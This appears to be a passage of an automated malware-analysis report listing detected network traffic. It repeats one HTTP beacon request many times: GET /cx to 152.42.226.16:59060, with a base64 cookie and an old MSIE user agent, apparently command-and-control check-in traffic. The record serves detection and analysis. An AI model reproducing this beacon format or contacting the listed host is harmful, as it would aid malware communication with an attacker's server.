                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
